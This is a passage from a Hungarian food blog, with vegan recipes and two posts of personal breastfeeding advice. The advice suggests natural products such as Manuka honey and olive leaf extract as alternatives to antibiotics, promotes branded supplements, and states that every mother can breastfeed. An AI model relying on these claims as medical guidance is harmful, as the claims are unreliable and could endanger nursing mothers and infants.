Még jól szerepelhet a rozspehely is, szóval érdemes ezeket a pelyheket váltogatni granola készítéséhez. Még olyanokat dobáltam hozzá, ami volt itthon: dió (de jöhet bele mandula, törökmogyoró is), tökmag (adhattok hozzá napraforgómagot is, nálam épp nem volt itthon) és akkor a szuper élelmiszerek – chia mag, szezámmag, hántolt kendermag (ez viszonylag új a konyhámban, de mindenbe tesszük: kásába, smoothie-ba és most a granolába is). Édesítésnek juharszirupot használtam. Ha nincs, adjatok hozzá mézet, agavé szirupot, vagy akár el is hagyhatjátok az édesítést, úgy is finom. Egy kevés fahéjat adtam hozzá fűszerezésként, és elmaradhatatlan a csipet só.
Legyetek kreatívak, a granola tárháza kifogyhatatlan. Pelyhek, magok, fűszerezés, bármi jöhet. Mi most vegán citromos joghurtra szórtuk, másnap reggel pedig a smoothie bowl-unkra szórtuk és már el is fogyott. Érdemes dupla adagot készíteni belőle. Garantált a gyors fogyás!
Diós kókuszos árpapehely granola
Hozzávalók:
– 2 bögre árpapehely
– 1 bögre dió
– 1/2 bögre tökmag
– 1/2 bögre kókuszreszelék
– 2 evőkanál chia mag
– 2 evőkanál szezámmag
– 2 evőkanál lenmag
– 3 evőkanál hántolt kendermag
– 1/2 teáskanál fahéj
– 1/2 teáskanál só
– 4 evőkanál juharszirup
– 4 evőkanál kókuszzsír
Melegítsük elő a sütőt 175 fokra. Egy nagy tepsit béleljünk ki sütőpapírral.
Egy tálban keverjük össze a száraz alapanyagokat: árpapehely, tökmag, dió, kókuszreszelék, chia mag, szezámmag, lenmag, kendermag, fahéj, só. A végén adjuk hozzá a juharszirupot és a kókuszzsírt és jól keverjük el. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 6-8 percig, keverjük át, majd süssük újabb 8-10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész).
Üvegben/dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom!
Gyümölcsös reggeli
2015. április 10. Nyers konyha
Édes, gyümölcsös, puha és ropogós... Egy tál boldogsággal indítom a napot! 2 almát s késes aprítóval daraboltam, rákarikáztam egy banánt, elkevertem fahéjjal és egy kanál kókuszdarával. Szórtam rá fagyasztott málnát és aprított ropogós mandulát. Meglocsoltam kókusztejjel és már volt- nincs. Csupa lemondás ez a nyers evés! Az élet szép, illetve mindenkinek olyan amilyenné teszi...
Babakonyha 6. Segítség, nem tudok szoptatni!
2015. április 6. Éltető ételek
Az előző részben felvázoltam azt, hogy mi is a baba számára a legtökéletesebb táplálék. Azonban vannak olyan anyák, akik nem tudnak, vagy nem akarnak szoptatni. Én nem ítélkezem felettük, gondolom, minden anya mérlegeli a lehetőségeit, és a döntést eképpen hozza meg. Amennyiben TE is szoptatási nehézségekkel küzdesz, ne aggódj, a stressz a lehető legrosszabb ilyenkor. Bújjatok össze pár napra a babáddal, és zárj ki minden zavaró tényezőt! Meglátod, hamarosan megoldódik a probléma. Mindenesetre a következőkben a leggyakoribb okokat írom le, ami miatt nem tudunk szoptatni. Ezek többsége helyes és gyakori mellretétellel, pihenéssel és elegendő folyadékbevitellel orvosolható. Szoptatni minden anya tud! Vagyis, akinek van melle, és vannak benne tejmirigyek. Az, hogy az a tej ki is jön onnan, na... az már más kérdés. Ennek számos oka lehet, technikai problémáktól egészen a lelki gondokig. A tejmirigyek hiányára egy picit visszakanyarodva, még ezeknek az anyáknak is van lehetőségük a "szoptatásra", a szoptanít készülék segítségével. Ekkor a női tej egy vékony csövön keresztül jut a bimbóhoz és azon keresztül a babához. Tehát ebben az esetben megmarad a bőrkontaktus, az összebújás "élvezete". Kisebesedett, fáj, érzékeny a mellbimbóm Kezdetben valóban érzékeny lehet a mellbimbó, főleg az első baba esetében. De ez maximum 2-3 hétig tart. Ekkor segítségünkre lehet a citromfűbalzsam. A kisebesedett, nyílt sebek nem természetes velejárói a szoptatásnak! Ennek a leggyakoribb oka a rossz mellretétel (szopási testhelyzet). Mindenesetre arra figyeljünk, hogy az anya gyomra mindig szemben legyen a baba gyomrával, tehát ne legyen "kifordulva" a baba. Próbáljunk olyan pozíciót felvenni, amikor kevésbé érezzük a fájdalmat. Ugyanis, ha mindig ugyanabban a testhelyzetben szoptatunk, akkor a baba nyelve mindig ugyanott fogja dörzsölni a cicit. Egyébként ebben nekem is jócskán volt tapasztalatom. Már a kórházból sebes mellbimbóval érkeztem haza, és a kezemben ott volt a tápszeres recept. Iszonyúan fájt, minden szopizás után mindig felázott a seb. DE, tudtam, hogy be fog gyógyulni, és nem tehetem meg azt, hogy nem szoptatok. Valahogy ösztönösen tudtam, hogy szoptatni kell, hiszen ez a természetes. De ha belegondolunk, jobb lett volna pihentetni a mellet? Nem, hiszen akkor még be is gyullad. Gyakori tanács még ilyenkor a bimbóvédő alkalmazása. Nos, célszerű ezt is elkerülni, mert nemhogy javítana, de még ront a baba szopási technikáján. Én is kipróbáltam, és bizony a fájdalom ugyanúgy jelen volt bimbóvédővel, mint anélkül. Annyi, hogy a baba nem áztatta fel a mellemet és így a sebet. Tehát semmiképp NE hagyjuk abba a szoptatást (a komfortszopás idejét csökkentheted), mert így nemcsak a tej mennyisége fog csökkenni, de a mell is később fog hozzászokni az újfajta ingerhez. Vérző mellbimbóval is lehet szoptatni, de feltétlenül meg kell keresni a kiváltó okot. A legjobb ilyenkor felkeresni egy szoptatási tanácsadót. Akkor mit tettem? Sajnos 12 évvel ezelőtt még nem volt internetünk, innen-onnan kapott tanácsokat alkalmaztam. Először is a szoptatások között szabadon hagytam a mellemet , valamint gyakran egy kevéske anyatejjel kentem be (remek sebgyógyító hatása van). Próbáltam olyan szoptatási testhelyzetet felvenni, hogy kevésbé fájjon, és ne fokozódjon a sebesedés. Sokféle testhelyzet van, próbáljunk ki többfélét! Ne használjunk szappant, elég egy langyos vizes lemosás. SOS! Mellgyulladás! Ez azért többnyire nem egyik napról a másikra alakul ki. A tejbelövellés időszakában az enyhe hőemelkedés, a mellek feszülése természetes jelenség. Ilyenkor a legfontosabb, hogy gyakran kell szoptatni, és a melltartót jobb nélkülözni, ugyanis megnyomhatja a melleket, és elzárhatja a tejcsatornákat. Ennek következtében tejpangás lesz a mellben, fájdalmas csomók alakulnak ki, amely "melegágya" a mellgyulladásnak. Ilyenkor használhatjuk a szoptatóolajat, amely az elzáródott tejcsatornák megnyílását támogatja. Persze mellgyulladás kialakulhat a sebes mellen keresztül bejutott kórokozók révén is. Ez kifejezetten magas lázzal és influenzaszerű tünetekkel járhat, mint pl. végtagfájdalom, gyengeség. Kívülről piros csík vagy folt látható a mellen. Törekedjünk ennek megelőzésére, segít ebben a fentebb említett ajakbalzsam is. Ilyenkor ne hideg, hanem MELEG pakolást tegyél a mellre, és olyan szoptatási pózokat kell felvenni, amellyel ezek a tejcsatornák ki tudnak ürülni. Akár a fekvő babára ráhajolva, vagy a hónod alá téve, de a hasadra fektetve is új pózok próbálhatók ki. Szoptatás előtt és alatt is gyengéden masszírozd a csomót, hogy a baba minél jobban ki tudja szívni a tejet. Mi is az a bimbóvédő? Anyuka, csak bimbóvédővel fog tudni szoptatni. Ez is gyakran elhangzik a kórházban. Az is baj, ha túl kicsi a mell, az is, ha túl nagy, ha befelé fordul a mellbimbó vagy éppen csak lapos. Nem baj, a bimbóvédő megoldja! Ezt felejtsük el. Ezzel egy rossz szopástechnika fog kialakulni, mivel ezt nehezebb szívni és nehezebb a babának a szájában tartani is. Azonban, ha a baba nem fogadja el a csupasz mellbimbót vagy cumizavaros (mert volt olyan időszak, amikor nem volt lehetőség szoptatni), akkor megpróbálható. Vékony, pillangó alakút válasszunk, hogy a baba a bőrünk illatát érezhesse. 3 óránként kell szoptatni Nem! A baba igényei szerint kell szoptatni. Ha óránkét akar, akkor óránként. Egyébként a babának a szopizás nemcsak étkezés, hanem megnyugtató, altató, vigasztaló cumizás is . Ha ezt a komfortszopást lehetővé tesszük a babának, akkor nem lesz szüksége nyugtató cumira. Sokan ijesztgetik az anyukákat, hogy ha a cicin alszik el, akkor a későbbiekben is csak így fog tudni elaludni. Na és? Talán jobb órákig járkálni és ringatni? Persze erre sokan azt mondják, hogy a baba tanuljon meg egyedül aludni. Igen, de erre ráérünk még. A szoptatásra ne sajnáljuk az időt! Én mindig is úgy voltam vele, hogy ha 1 órát akar mellen lenni, akkor hadd legyen... és bizony rajta aludt el. Ez idő alatt legalább én is pihentem, ilyenkor nem létezett körülöttem semmi, csak én és a gyermekem. Olyan bensőséges kapcsolat alakult ki ilyenkor, hogy ez szavakkal leírhatatlan. A baba nem egy óramű, hogy percre pontosan éhezzen meg. Arról nem is beszélve, hogy a szomját is az anyatej oltja. Mi felnőttek sem órához igazodva eszünk, hanem amikor megéhezünk, igaz? Ne felejtsük azt el, hogy minél gyakrabban kerül mellre a baba, annál több tejünk lesz, ez a kereslet-kínálat törvénye... és itt rá is térhetünk a következő pontra. Nincs elég tejem Nagyon fontos, hogy minden szoptatás előtt igyunk egy pohár vizet. A szoptatás alatt is kortyoljunk be még 1 pohárral. Pihenjünk minél többet, és legyen minél több bőrkontaktus a babával. Alkalmazzuk az igény szerint szoptatást , amely lényege, hogy a csecsemő minden alkalommal mellre kerül, amikor jelzi szopás iránti igényét. A szoptatások gyakorisága és időtartama nincs meghatározva. Szoptassunk mindkét mellből, és az esetleges mellben maradt tejet fejjük ki. Amennyiben viszont helyreállt a kereslet-kínálat, akkor már nem szükséges fejni. Persze vannak még egyéb praktikák, amikkel fokozni lehet a tej termelődését, a későbbiekben erre ki is fogok térni. Ezenkívül a babának vannak fejlődési ciklusai (pl. 6 hetes, 3 hónapos kor körül), amikor hirtelen megnövekszik az igénye. Az "ugrás" miatt csökken a tej mennyisége, de ugyanakkor annak tápértéke, összetétele is igazodik a baba szükségleteihez. Ne add fel, hogy ennyi volt... ahhoz, hogy az anya szervezete ehhez igazodni tudjon, kell pár nap. Ilyenkor nagyon fontosak a fentebb említett dolgok, vagyis a gyakori mellretétel és a bőséges folyadékfogyasztás. Ne feledd! Minél jobban ürül a mell, annál több termelődik. A mérleg azt mutatja, hogy keveset szopott Hmm... én az első lányomnál minden etetés előtt és után mértem, mint a kisangyal. A második és a harmadik lányomnál már nem volt mérlegem. Én azt tapasztaltam, hogy teljesen stresszben voltam, hogy jajjj, keveset szopott, kevés a tejem. Úgy gondolom, hogy ha a gyermekünk jókedvű, mosolygós, akkor nem éhezik. Nem hízik, akkor tápszer kell! Annak, hogy nem hízik a babánk, több oka is lehet. Ha van elég tejünk, akkor nem kell tápszer, és nem is kell kekszet és tejpépet adni a babánknak. Volt olyan ismerős, aki azért akart tápszert adni a babájának (vagy a védőnő javaslatára), mert nem tudott szoptatás után fejni! Kérdem én, minek? Remekül beáll a kereslet-kínálat törvénye, nincs szükség több tejre. Szoptatni minden anya tud. Ha császáros volt a baba, akkor mindenképp szükség lenne bélflóra harmonizálásra (az emóció már újszülött kortól adható), és ilyenkor a nyírfanedv is jó szolgálatot tesz. (Egyébként ez máskor is, nem csak ebben az esetben.) A babák fejlődési üteme elég eltérő. A tápszeres babák gyorsabban híznak, mint az anyatejesek. Általánosságban elmondható, hogy féléves korukra duplázzák meg születési súlyukat, és 1 éves korukra pedig 3x-os lesz a súlyuk, de ettől az anyatejes babák eltérhetnek. Nekem az első hónapokban jócskán híztak, majd lecsökkent a növekedés, és 1 éves korukra sem volt meg a háromszoros súly. Nem beszélve arról, hogy 6 hónapos kor után kezdődnek az intenzív mozgások, kúszás, mászás, szinte kis duracell nyuszik lesznek. Szóval jócskán le is tornázzák a bevitt ételt. A baba fejlődésének mércéjét nemcsak a súlynövekedése jelenti, hanem fontos szempont a hossz- és fejkörfogat változása is. Valamint a babára ránézve is rögtön látjuk, hogy milyen a hangulata, a mozgásfejlődése. Tehát ez sokkal összetettebb dolog, minthogy csak a súlyra asszociáljunk. Túl híg a tejem, már nem elég jó a babának Ilyen nincs. A tej mindig olyan, amilyennek lennie kell. A baba igényeihez igazodik. Sőt, a szoptatás során is változik az összetétele. Az elején hígabb, szomjoltóbb, úgy 5 perc elteltével pedig jön a sűrűbb, laktatóbb tej. Ezért is fontos, hogy hagyjuk, hogy jól kiszopja az egyik mellett, és csak utána tegyük át a másikra (ha szükség van rá). Sokan azért adnak tápszert a babának, hogy az éjszakát átaludja. Nos, valóban fel kell kelni éjszaka 2-3-szor, és bizony a visszaaltatás sem megy mindig könnyen. Bár sok esetben, amikor felébredt, csak cicire tettem, és aludtunk is tovább. Az, hogy szoptatás után sírós, az többnyire a hasfájás miatt van. Bizony mi is járkáltunk a nagylányommal hosszú-hosszú időket, hogy végre megnyugodjon és elaludjon. Ez tápszeres babáknál is ugyanúgy előfordulhat, úgyhogy ezt ne írjuk a szoptatás "számlájára". Beteg vagyok vagy gyógyszert szedek, szoptathatok? Ha belázasodsz, valamilyen fertőző betegséged lesz, az még nem ok arra, hogy ne szoptass. Hiszen a betegség kórokozói már sokkal hamarabb a szervezetedben volt, mint ahogy a tünetek jelentkeztek volna. Ilyenkor az anyatej tartalmazza azokat az ellenanyagokat, amik megvédik a babádat a fertőzéstől. Legalábbis sokkal gyorsabban és enyhébb formában fognak a tünetek jelentkezni nála. Egyébként a fertőzés nem az anyatejen keresztül fog a babádba átjutni, hanem cseppfertőzés útján. Persze azt nehéz betartani, hogy ne puszilgassuk ilyenkor gyermekünket, de az biztos, hogy hamarabb át fogja vészelni az esetleges fertőzést, mint a mesterségesen táplált társaik. Erősítsd az immunrendszeredet, ezáltal - az anyatejen keresztül - a babád szervezetét is erősíteni fogod. Szedjél béta-glükánt és nagyon jó az Organic Force is, amelynek gondosan összeválogatott összetevői erőteljes antioxidáns hatásúak. Ezenkívül még van benne almarost és csicsóka is, amely garantálja a tökéletes felszívódást. De még bátran ajánlom a feketeszeder italkészítmény fogyasztását is a szoptatás időszakában, amely vassal és értékes polifenollal látja el a szervezeted (és ezáltal a babádét is). Amennyiben fogorvoshoz kell menned vagy röntgenre, emiatt szintén ne hagyd abba a szoptatást. A béta-glükán fogyasztása ilyenkor is fokozottan javasolt! Ha antibiotikumra van szükséged, mindenképp beszéld meg kezelőorvosoddal és gyermekorvosoddal is (remélhetőleg ők kellő mértékben a szoptatás pártján állnak), és olyan gyógyszert (természetes, pl. Manuka méz, Olajfalevél kivonat, Grape Vital) szedjél, ami nem árt a babádnak. Például gyulladáscsökkentésre nyugodtan szedheted a zyflamendet is. Sok esetben a (gyógy)szer tájékoztatója alapján ellenjavallt szoptatás alatt szedni. Ez azért van így, mert ha kifejezetten nem vizsgálták a terméket várandós, illetve szoptatós kismamákon, akkor rá kell írni ezt a figyelmeztetést még abban az esetben is, ha az összetevők alapján ez nem tűnik indokoltnak. Bármilyen szoptatási nehézséged van, tessék segítséget kérni. A szoptatási tanácsadók magasan képzett szakemberek, biztos vagyok benne, hogy ha akarsz szoptatni, akkor segítséggel fogsz is!
Nyuszis répatorta
A répatorta vegán, a nyuszis dekorációba beköszönt némi tejfehérje a Hulala által... Egy munkatársamnak immár a 4. gyermeke született meg, náluk voltunk látogatóban múlt hétvégén. A gyerekeknek készítettem ezt a tortát. (Nem vegán a család.) Életem első próbálkozása volt, hogy valami "gyerekes" témát kreáljak. Nyilván, ha marcipánból vágom ki a nyuszi tappancsait, füleit, stb., akkor sokkal szebb lett volna, de marcipán híján maradt a tejszínhab. Amit pedig a munkatársam kislányai nagyon szeretnek. Mi is készíthetünk húsvét alkalmából egy ilyen tortácskát. A rózsaszín habot eperrel (fagyasztott) színeztem, a barnához pedig karobport és kakaóport kevertem. Egyik esetben sem kellett plusz cukor vagy édesítő hozzá. A Hulala ugyanis elég édes magában is...
A recept:
Hozzávalók:
kb. 20 dkg reszelt sárgarépa
kb. 10 dkg reszelt alma
1 banán
1 bögre (2 dl) apró szemű zabpehely
1-2 evőkanál őrölt lenmag (áztassuk langyos vízben pár percet)
1 bögre (2 dl) durvára őrölt magok (dió, mogyoró, stb.), mák
1 tk szódabikarbóna
2 bögre datolya felaprítva, langyos vízben áztatva
1 tk fahéj
kb. 1 bögre teljes kiőrlésű liszt
kb. 1/2 bögre fehér liszt
2 ek olaj
1 narancs leve kicsavarva, héja lereszelve
víz
Elkészítés:
Az őrölt lenmagot kétszeres mennyiségű langyos vízbe beáztatjuk. A datolyát felaprítjuk és szintén kétszeres mennyiségű meleg vízbe beáztatjuk. A répát és almát, valamint a narancs megmosott héját lereszeljük. A száraz hozzávalókat - zabpehely, liszt, őrölt magok, szódabikarbóna - összekeverjük egy tálban. Hozzáadjuk a lereszelt almát és répát, a villával összenyomott banánt. Összekeverjük. A megpuhult datolyát a vízzel együtt ráöntjük, a lenmagot vízzel együtt ráöntjük, belecsavarjuk a narancsot, hozzáadjuk az előzőleg lereszelt héját. Olajat is ráöntjük, majd annyi vizet keverünk hozzá, amitől sűrű, de folyékony állagú lesz, mint pl. egy piskóta. Nagyon kevés fahéjat hozzákeverünk. Ha nem elég édes, banánnal vagy egyéb édesítővel tovább édesíthetjük. Tortaformában kb. 25 perc alatt készre sütjük. Sütőpapírral érdemes kibélelni a tortaformát. Ennek híján lehet kókuszzsírral kikenni és liszttel kicsit megszórni a formát, mielőtt az összekevet tésztát beleöntjük.
Egy kisebb tepsibe is sütöttem egy adagnyit ebből, azt használtam a tapsifüles megformázásához. Abból lett kivágva a tappancs, a fül, a szem, a pofi, az orr. Vérnarancs adta a száját. Ezeket jól bekentem felvert hulalával, majd ráraktam a tortaformára. Kicsit sietősen készült. Ha több időm lett volna, biztos még jobban nézett volna ki. Bár így is aranyos volt. Kata és Tünde a 4 gyermek közül kettő, rögtön a nyuszi füleit akarta megenni. Szóval mondhatom, sikere volt. :)
Boldog húsvéti ünnepeket kívánok minden kedves olvasómnak!
Sütőben sült édesburgonyás sárgarépafasírt (gluténmentes, vegán), uborkás kuszkusszal
A naptár szerint Húsvét van! :-) Én még az előző ünnepi menüsort sem fejeztem be, de már itt is egy újabb hosszú hétvége, a Húsvét! Természetesen fejet hajtok az idő múlása, és a naptár előtt, úgyhogy felfüggesztem a korábbi zöld receptek posztjait, és hozok nektek egy-két húsvéti hangulatú, egyszerűen elkészíthető, könnyedén emészthető, egészséges, rendhagyó és látványos ételt. édesburgonyás sárgarépafasírt (gluténmentes, vegán) Mivel az idén úgy alakult, hogy mi munkával töltjük az ünnepeket, ezért nem is készülök nagy sütéssel-főzéssel, vendégvárással. A mennyiség nem fontos, a minőség, és különlegesség helyett pedig úgy döntöttem, inkább viccesre, és szórakoztatóra veszem a stílust! Így a húsvétra jellemző figurák megformálására helyeztem a hangsúlyt az ételek és a desszert elkészítésénél. Jó kis gyurmázós nap volt ez a mai, amikor is megszületett a répa formájú, könnyed és puha, édesburgonyás sárgarépafasírt, uborkás kuszkusszal. Desszertnek pedig tojás alakú, színes, tápanyagban gazdag, nyers, gyümölcsös kókuszos falatkákat készítettem. Kedves Olvasó! Ezzel a két recepttel... "Ez az egész évben beszerezhető zöldség -a sárgarépa- a levesek, zöldséges ételek többségének alkotóeleme, ezért valószínűleg senki sem gondolná, hogy nem fogyaszt belőle eleget. Érdemes azonban tudatosan is beiktatnunk táplálkozásunkba, hiszen karotinjai erősítik az immunrendszert, védenek a szabad gyökök károsító hatásával szemben, és a daganatos betegségek megelőzésében is fontos szerepük lehet." Forrás: Vital.hu sütőben sült édesburgonyás sárgarépafasírt, uborkás kuszkusszal HOZZÁVALÓK: édesburgonyás sárgarépafasírt (kb.12 db) - 1 nagy fej vöröshagyma - 3 gerezd fokhagyma - 1 nagy és érett paradicsom - 4 szál közepes sárgarépa (organikus) - 1 közepes méretű édesburgonya - fűszerek: őrölt fekete bors, Himalája só, bio ételízesítő, 2 ek pirospaprika fűszer, 1 ek mustár - 1 marék friss petrezselyem - 1 marék szezámmag - 1 ek őrölt lenmag 3 ek vízben elkeverve, és 10 percig állni hagyjuk, hogy kocsonyásodjon (vegán tojáspótló) - 1 ek útifűmaghéj - 100 g gluténmentes liszt pl.: barna rizsliszt (én ezt használtam), kukorcialiszt, csicseriborsóliszt, kölesliszt stb. uborkás kuszkusz (kb.4 főre) - 1 csésze jó minőségű kuszkusz - 2 csésze forró víz - Himalája só - 1/2 közepes kígyó uborka (Gluténmentes diétába a kuszkusz NEM illeszthető be!) édesburgonyás sárgarépafasírt (gluténmentes, vegán ) ELKÉSZÍTÉS: A megpucolt édesburgonyát feldaraboljuk kisebb kockákra, és kb.15-20 perc alatt készre pároljuk. (Ehhez a legtökéletesebb egy párolóedény). Közben a héjától megszabadított vöröshagymát, és fokhagymát, az érett paradicsommal együtt, felkockázzuk, és a turmix gépben egyneművé turmixoljuk. A sárgarépákat miután megpucoltuk, szintén pépessé turmixoljuk. A kapott két pürét egy tálba öntjük, és hozzáadjuk a fűszereket (só, bors, ételízesítő, mustár, pirospaprika). A friss petrezselymet apróra vágva a tálba szórjuk, a szezámmaggal, az útifűmaghéjjal és a kocsonyásított lenmaggal együtt. Az egészet összekeverjük a kiválasztott gluténmentes lisztünkkel, miközben a sütőt 200°C - ra előmelegítjük. Kézzel répa formákat gyúrunk a fasírt alapanyagból, amelyeket egy sütőpapírra helyezünk, és kókusz olajjal vékonyan megkenünk (a répák tetejét). Légkeveréses programon kb.25 perc alatt, majd a végén plusz 5 percig grillezős programon készre sütjük a répa formájú répa fasírtokat, amelyek tökéletes húspótlók nem csak Húsvétkor! ;-) Igyekszem kerülni az olajban sült ételeket, így a zöldség fasírtjaim is olajtól nem tocsogó, kalóriabarát, sütőben süthető mégis puha és omlós főételek. Mint ez a sárgarépa fasírt, vagy a korábbi lencsefasírt és diósült is. ;-) uborkás kuszkuszAmíg a répák süldögélnek a sütőben, elkészítjük a kuszkuszt a szokásosan egyszerű módon. Egy műanyag keverő tálba teszünk egy csapott bögre kuszkuszt, egy csipet sót, és hozzáadunk 2 bögre forró vizet. Azonnal lefedjük légmentesen folpackkal, és 20 percre állni hagyjuk. A kuszkusz megszívja magát a vízzel, a vízgőzben felpuhul, és kész is. Miután elkészült, összekeverjük a friss és nyers kockákra vágott kígyó uborkával, és már tálalhatjuk is a frissen sült, puha sárgarépa fasírtunk mellé.:-) Ha valaki ügyel a kalórai bevételre, vagy teljesen gluténmentes ételt szeretne, vagy csak egy könyedebb vacsorára vágyik, akkor hagyja az uborkás kuszkuszt, és fogyasszon a répa fasírt mellé, sok-sok nyers zöld zöldséget, salátát. Úgy is nagyon finom lesz! ;-) nyers és friss zöld saláta Táplálkozásban- és nem csak étkezésben gazdag, örömteli ünnepi hétvégét kívánunk! Megjegyzés: Ha valaki nem tudná a "kuszkusz a szó szoros értelmében tészta, mely úgy készül, hogy daraszemeket nagyon finom lisztréteggel vonnak be, így azok könnyebben magukba szívják a nedvességet. Kinézetre inkább gabonafélének tűnik, és megfőzni is úgy szokás. A kuszkusz Észak-Afrikából származik, ahol a legelterjedtebb főzési módja, hogy egy ragu felett megpárolják. A szemek, miközben megduzzadnak és megpuhulnak, magukba szívják az étel gőzét és aromáját. Így készül például a híres észak-afrikai húsétel, a tagine, mely arról a kúp alakú edényről kapta a nevét, amelyben hagyományosan főzik." Forrás: Readers Digest
Babakonyha 5. Anyatej, a tökéletesen megalkotott táplálék
2015. április 2. Éltető ételek
Megérkezett végre a baba. Mit tegyünk? Hogyan gondozzuk? Tudom-e szoptatni? Jó anya leszek-e? Ilyen és ehhez hasonló gondolatok röpködnek a fejünkben szülés után, jobbnál jobb tanácsokat kapunk, mindenki tudja a tutit! De vajon az a tanács nekem és a babámnak is jó lesz? A döntést sokszor nem az édesanya hozza meg, hanem pl. a divat, a családtagok, szakemberek, olyanok, akik még soha nem szoptattak. Hallgass az ösztönödre és a babád ösztönére is! Legyél határozott! Ha eldöntötted, hogy szoptatni fogsz, akkor ne hagyd, hogy eltántorítsanak ettől. Meg kell vívni a harcot sok esetben a védőnénivel, a dokinénivel vagy az anyóssal szemben is. A te gyereked, a te döntésed! A baba első tápláléka 6 hónapos korig KIZÁRÓLAG az anyatej! A WHO meghatározása szerint kizárólagos anyatejes csecsemő az, aki anyatejet - beleértve a saját anya lefejt tejét és az idegen női tejet - kap. Ez a definíció megengedi a vitaminok, ásványi anyagok és gyógyszerek csepp és szirup formában történő adását és az ORS-t (orális rehidráló folyadék), de ezen kívül semmi mást. Az anyatej a csecsemő optimális gyarapodásához szükséges összes folyadékot és tápanyagot tartalmazza minimum féléves korig, és akár azon túl is. Ez nem csak egy egyszerű étel, a szoptatás valóban TÁPLÁLÉK! Nemcsak a GYERMEK TESTÉT, a LELKÉT is táplálja. Nincs biztonságosabb érzés egy gyermek számára, mint átölelve lenni az édesanyja karjában, szoptatás közben. A szoptatás folyadék-kiegészítéssel meghatározás abban különbözik a kizárólagos szoptatás definíciójától, hogy az ott megfogalmazottakon túl folyadék (víz, víz-alapú italok, gyümölcslé) adását is megengedi, de ezen kívül semmi egyebet (humán tej, tápszer, egyéb étel alapú folyadékok). Mi is az a kolosztrum? Már a születés első percében a legfontosabb a korai bőrkontaktus, a minél korábbi mellretétel. Ha a szülőszobai személyzet nem ajánlja fel a szoptatást, nyugodtan kérheted. Ha a baba és te is jó állapotban vagy, semmilyen egészségügyi ok nem szól ellene. A minél korábbi mellretétel elősegíti, hogy a későbbiekben legyen elegendő tejed, valamint lehetősége lesz a babádnak a kolosztrum hozzájutásához. De miért is olyan fontos a kolosztrum , vagy más néven, az előtej? Ennek nem a mennyisége a lényeg, hanem a hatása. Bevonja a baba tápcsatornáját, olyan, akár egy kiváló védőoltás. Bár csak kortyokról van szó az első 1-2 napban, remekül segíti az alkalmazkodást, hashajtó hatása előmozdítja a ragadós, sötétzöld magzatszurok ürülését. Rengeteg olyan immunanyagot tartalmaz, amely megvédi az újszülöttet a külvilág kórokozóitól. Tehát ez az első és a legfontosabb, hogy ehhez a babánk hozzájusson! A tejbelövés úgy a 3. nap körül történik meg, de ne ijedjünk meg, nem fog éhezni a baba 3 napig, addig tökéletesen elég neki a kolosztrum. Amennyiben nincs lehetőséged az azonnali mellretételre, akkor a szülés után 6 órán belül kezdd meg a fejést, és adasd oda a babádnak. Ne várj a tejbelövellésig! A szülés utáni súlyesés a születési súly 7-10 százalékáig teljesen normális jelenség, nem az éhezés jele, nem kell rögtön a tápszerhez nyúlni. A gyakran mellre tett újszülött súlycsökkenése a harmadik nap után rendszerint nem folytatódik, majd pár napos stagnálást követően emelkedni kezd, és a 7-10. nap között a baba újra visszanyeri születési súlyát. De ez kéthetes korig is kicsúszhat, pl. császármetszés után. Mi a titka az anyatejnek? Tápanyagösszetétele optimális a gyermek növekedése és fejlődése szempontjából. Az anyatejben a vastartalom biológiai hozzáférhetősége 50 százalékos, míg a tápszerekben csupán 7%. Az anyatej kalciumának 75 százaléka szívódik fel a csecsemő szervezetében, míg a tehéntejalapú tápszer esetében ez csak 50 százalék. Közvetlen forrása a GLA-nak (gamma-linolénsav), valamint omega 3 forrás is. Ezek nélkülözhetetlenek az idegrendszer, a látás és az immunrendszer fejlődéséhez. Az anyatej összetétele mindig a baba igényeihez (fejlődési szükségleteihez) igazodik. Olyan immunanyagokat tartalmaz, amely segíti a csecsemő fejletlen védekezőrendszerét. Ha pl. az anya náthás lesz, akkor ennek az ellenanyaga rövid időn belől megjelenik az anyatejben, amely védelmet jelent számára. Ez nem azt jelenti, hogy nem lesz beteg, de enyhébb lefolyású lesz a betegség. Csökkenti az allergiát. A nagy molekulájú szénhidrátok (oligoszacharidok) kiváló táptalajt, táplálékforrást biztosítanak a jó hatású bélbaktériumoknak, ezáltal támogatva a jó bélflóra kialakulását. Mint tudjuk, az immunrendszerünk mintegy 70%-a a bélflóránkban található, tehát nagyon fontos, hogy a baba bélflórája a lehető legjobb "kezekben" legyen. Hosszú távon védelmet nyújt a magas vérnyomás és az elhízás kialakulása ellen. Az anyatej gyulladáscsökkentő és antimikrobás hatása révén alkalmas arra, hogy alkalmanként orrcseppnek, szemcseppnek használjuk. A sebes mellbimbóra is jó hatással van, segíti annak gyógyulását. (Ezt én is tapasztaltam.) Nemcsak táplálék, hanem remek szomjoltó is. Tehát nincs szüksége a babának vízre és egyéb folyadékra. - Azonnal fogyasztható, steril, nincs szükség előkészületekre. Teljesen ingyenes és környezetbarát. A szoptatás jótékony hatással van az anya és a gyermek egészségére, miközben káros hatása nincs. Támogatja az anya-gyermek kapcsolat kialakulását. Csökkenti a szülés utáni vérzést, segíti a várandósság előtti testsúly visszanyerését és az első hat hónapban természetes fogamzásgátlóként is hat. A nem-szoptatás veszélyei Azok a gyermekek, akiket nem szoptatnak, vagy nem kapnak anyatejet, számos betegség fokozott kockázatának vannak kitéve. Évente 1,5 millió gyermek hal meg azért, mert nem szoptatják. A halálesetek döntő többsége a fejlődő országokban történik, a probléma ugyanakkor nem korlátozódik csak a szegény országokra. A fejlett Egyesült Államokban is évente 9000 gyermek halálát lehetne megelőzni a szoptatással. Bár a szoptatás hiánya nem minden esetben okoz halált, az akut és krónikus betegségek kockázatát a mesterséges táplálás igen jelentősen fokozza . Ne felejtsük el, a felnőttkori krónikus betegségek a gyerekkori táplálkozás hiányosságaihoz vezethetők vissza. A következőkben felsorolt statisztika a mesterséges táplálás, és a kizárólagosan 3! hónapig szoptatottak összehasonlítására vonatkozik . Gondoljunk csak bele, mennyivel jobb lenne a helyzet, ha tovább szoptatnánk gyermekünket. A középfülgyulladás gyakorisága kétszeres a szoptatott babákhoz viszonyítva. A nem-specifikus gyomor, bélrendszeri gyulladások gyakorisága a mesterségesen tápláltak körében 2,7-szeres a szoptatottakhoz képest. A mesterségesen táplált csecsemők körében lényegesen gyakoribb a hirtelen csecsemőhalál: a csecsemőkor minden szakaszában kétszerese a szoptatottakénak (egyes kutatások szerint ötszöröse). Az asztma a tápszerrel táplált gyermekek körében 